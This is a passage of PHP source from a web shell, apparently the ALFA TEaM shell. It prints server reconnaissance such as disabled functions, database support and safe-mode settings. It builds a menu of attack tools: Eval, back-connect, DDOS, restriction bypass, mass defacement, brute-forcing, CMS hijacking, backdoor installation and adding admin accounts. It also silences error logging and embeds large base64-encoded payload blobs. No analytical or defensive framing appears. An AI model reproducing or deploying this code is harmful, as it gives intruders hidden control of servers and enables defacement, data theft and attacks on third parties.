1274. {
1275. echo $useful_downloader;
1276. $GLOBALS["need_to_update_header"] = "true";
1277. }
1278. }
1279. else
1280. {
1281. echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
1282. echo alfaEx('ver', false, false);
1283. echo '</td></tr> <tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td></tr></b>';
1284. }
1285. $quotes = (function_exists('get_magic_quotes_gpc') ? get_magic_quotes_gpc() : '0');
1286. if ($quotes == "1" or $quotes == "on")
1287. {
1288. $magic = '<b><span class="header_on">ON</span>';
1289. }
1290. else
1291. {
1292. $magic = '<span class="header_off">OFF</span>';
1293. }
1294. echo '<tr><td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>' . Alfa_GetDisable_Function() . '</b></td></tr><tr><td height="16" colspan="2"><span class="header_vars">CURL :</span>' . $curl . ' | <span class="header_vars">SSH2 : </span>' . $ssh2 . ' | <span class="header_vars">Magic Quotes : </span>' . $magic . ' | <span class="header_vars"> MySQL :</span>' . $mysql . ' | <span class="header_vars">MSSQL :</span>' . $mssql . ' | <span class="header_vars"> PostgreSQL :</span>' . $pg . ' | <span class="header_vars"> Oracle :</span>' . $or . ' ' . ($GLOBALS['sys'] == "unix" ? '| <span class="header_vars"> CGI :</span> ' . $cgi_shell : "") . '</td><td width="15%"><center><a href="http://zone-h.org/archive/notifier=ALFA%20TEaM%202012" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></td></tr><tr><td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>' . $open_b . '</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>' . $safe_exe . '</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>' . $safe_include . '</b></td></tr><tr><td height="11"><span class="header_vars">SoftWare: </span></td><td colspan="2"><b>' . @getenv('SERVER_SOFTWARE') . '</b></td></tr>';
1295. if ($GLOBALS['sys'] == "win")
1296. {
1297. echo '<tr><td height="12"><span class="header_vars">DRIVE:</span></td><td colspan="2"><b>' . $drives . '</b></td></tr>';
1298. }
1299. echo '<tr><td height="12"><span class="header_vars">PWD:</span></td><td colspan="2"><span id="header_cwd">' . $cwd_links . ' </span><a href="javascript:void(0);" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a><a href="javascript:void(0);" onclick="path_history(\'back\');"><span class="back_shell">[ BACK ]</span></a></td></tr></table></div><div id="meunlist"><ul>';
1300. $li = array(
1301. 'FilesMan' => 'Home',
1302. 'proc' => 'Process',
1303. 'phpeval' => 'Eval',
1304. 'sql' => 'SQL Manager',
1305. 'dumper' => 'Mysql Dumper',
1306. 'hash' => 'En-Decoder',
1307. 'connect' => 'BC',
1308. 'ssh2' => 'SSH2',
1309. 'zoneh' => 'ZONE-H',
1310. 'dos' => 'DDOS',
1311. 'safe' => 'ByPasser',
1312. 'cgishell' => 'Cgi Shell',
1313. 'ssiShell' => 'SSI SHELL',
1314. 'cpcrack' => 'Hash Tools',
1315. 'portscanner' => 'Port Scaner',
1316. 'basedir' => 'Open BaseDir',
1317. 'mail' => 'Fake Mail',
1318. 'ziper' => 'Compressor',
1319. 'IndexChanger' => 'Index Changer',
1320. 'pwchanger' => 'Add New Admin',
1321. 'ShellInjectors' => 'Shell Injectors',
1322. 'php2xml' => 'PHP2XML',
1323. 'cloudflare' => 'CloudFlare',
1324. 'Whmcs' => 'Whmcs DeCoder',
1325. 'symlink' => 'Symlink',
1326. 'MassDefacer' => 'Mass Defacer',
1327. 'Crackers' => 'BruteForcer',
1328. 'searcher' => 'Searcher',
1329. 'cmshijacker' => 'CMS Hijacker',
1330. 'remotedl' => 'Remote Upload',
1331. 'inbackdoor' => 'Install BackDoor',
1332. 'whois' => 'Whois',
1333. 'settings' => 'Alfa Settings',
1334. 'plus' => '<span class="alfa_plus">Alfa +</font>',
1335. 'selfrm' => 'Remove Shell'
1336. );
1337. foreach ($li as $key => $value)
1338. {
1339. echo ('<li><a href="javascript:void(0);" class="menu_options" onclick="g(\'' . $key . '\',null,\'\',\'\',\'\');">' . $value . '</a></li>' . "\n");
1340. }
1341. if (!empty($_SESSION['AlfaUser']) && !empty($_SESSION['AlfaPass'])) echo '<li><a href="javascript:void(0);" onclick="g(\'logout\',null,\'\',\'\',\'\');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>';
1342. else echo '</ul></div>';
1343. }
1344. else
1345. {
1346. @error_reporting(E_ALL ^ E_NOTICE);
1347. @ini_set('error_log', NULL);
1348. @ini_set('log_errors', 0);
1349. @ini_set('max_execution_time', 0);
1350. @ini_set('magic_quotes_runtime', 0);
1351. @set_time_limit(0);
1352. }
1353. }
1354. function alfalogout()
1355. {
1356. unset($_SESSION['AlfaUser'], $_SESSION['AlfaPass']);
1357. echo ("<center><font color='red'>Logout...</font></center>");
1358. }
1359. function showAnimation($name)
1360. {
1361. return '-webkit-animation: ' . $name . ' 800ms ease-in-out forwards;-moz-animation: ' . $name . ' 800ms ease-in-out forwards;-ms-animation: ' . $name . ' 800ms ease-in-out forwards;animation: ' . $name . ' 800ms ease-in-out forwards;';
1362. }
1363. function __showicon($r)
1364. {
1365. $s['btn'] = '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';
1366. $s['alfamini'] = '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';
